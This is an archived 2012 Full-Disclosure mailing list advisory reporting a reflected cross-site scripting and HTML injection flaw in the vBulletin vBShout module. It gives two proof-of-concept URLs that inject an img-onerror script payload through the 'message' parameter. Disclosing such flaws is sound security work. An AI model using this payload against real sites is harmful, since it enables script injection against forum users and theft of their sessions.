lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sun, 25 Mar 2012 18:04:19 +0300
From: d3v1l <d3v1l.securityshell@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: vBulletin vBShout Module <= 6.0.5
 (vbshout.php?message=) - Reflected Cross-Site Scripting ( XSS ) & HTML
 Injection

###############################################################################################################


#  Title: vBulletin vBShout Module <= 6.0.5 (vbshout.php?message=) -
Reflected Cross-Site Scripting ( XSS )

#  Note:  HTML Injection and Redirect works too

#  Script Page : http://www.dragonbyte-tech.com

#  Date: 24-03-2012

#  Author : Avram Marius Gabriel (d3v1l)

#  RandomStorm  - http://www.randomstorm.com

#  Tested on: Windows XP & Vista


###############################################################################################################


#  The last version of vBulletin vBShout Module suffers from Cross-Site
Scripting and HTML Injection
   The issue is located in Shoutbox Search Archive

#  POC:

#  http://www.site.com/vbshout.php?message="><textarea><!-- </textarea><img
src=1
onerror=alert("XSS")>&username=&hours=&from[month]=0&from[day]=&from[year]
=0&end[month]=0&end[day]=&end[year]=0&chatroomid=0&orderby=DESC&perpage=5&s=&do=archive&instanceid=1


#  http://www.site.com/vbshout.php?message="><textarea><!-- </textarea><img
src=1 onerror=alert("XSS")>&s=&do=archive&instanceid=1


################################################################################################################



# vBShout is the ideal way to keep members on your forum while they wait
for replies to their posts.
  It can be used in many ways - as a chat room for members, for staff to
discuss issues in realtime,
  as a live-update feed of new posts and threads, as a way to track member
milestones

################################################################################################################

-- 
Check My Blog <http://security-sh3ll.blogspot.com> or Follow me on
Twitter<http://twitter.com/securityshell>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ